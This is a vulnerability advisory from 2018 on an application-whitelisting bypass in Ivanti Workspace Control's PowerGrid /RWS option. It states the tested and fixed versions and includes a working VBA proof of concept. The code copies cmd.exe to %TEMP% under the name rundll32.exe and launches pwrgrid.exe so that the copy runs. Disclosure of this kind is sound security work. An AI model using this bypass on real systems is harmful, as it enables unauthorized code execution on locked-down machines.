It was found that the PowerGrid application will execute rundll32.exe from a relative path when it is started with the /RWS command line option. An attacker can abuse this issue to bypass Application Whitelisting in order to run arbitrary code on the target machine. This issue was successfully verified on Ivanti Workspace Control version 10.2.700.1.
81f68b864a5e934987060adf6222477b------------------------------------------------------------------------
Ivanti Workspace Control Application Whitelist bypass via PowerGrid /RWS
command line argument
------------------------------------------------------------------------
Yorick Koster, August 2018
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was found that the PowerGrid application will execute rundll32.exe
from a relative path when it is started with the /RWS command line
option. An attacker can abuse this issue to bypass Application
Whitelisting in order to run arbitrary code on the target machine.
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on Ivanti Workspace Control version
10.2.700.1.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue was resolved in Ivanti Workspace Control version 10.2.950.0.
PowerGrid now uses the GetSystemDirectory() function to construct an
absolute path to rundll32.exe.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20180801/ivanti-workspace-control-application-whitelist-bypass-via-powergrid-_rws-command-line-argument.html
Proof of concept
The VBA code below demonstrates this issue. The code tries to run cmd.exe from the %TEMP% folder.
Private Sub PowerGridAWLBypass()
On Error Resume Next
Dim tmpPath, resPath, targetPath
tmpPath = Environ("TEMP")
resPath = Environ("RESPFDIR")
targetPath = Environ("SystemRoot") & "\System32\cmd.exe"
FileCopy targetPath, tmpPath & "\rundll32.exe"
ChDir tmpPath
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
Dim oFile As Object
Set oFile = fso.CreateTextFile(tmpPath & "\foo.xml")
oFile.WriteLine "<foo></foo>"
oFile.Close
Set fso = Nothing
Set oFile = Nothing
Shell resPath & "\pwrgrid.exe /RWS foo.xml", vbNormalFocus
End Sub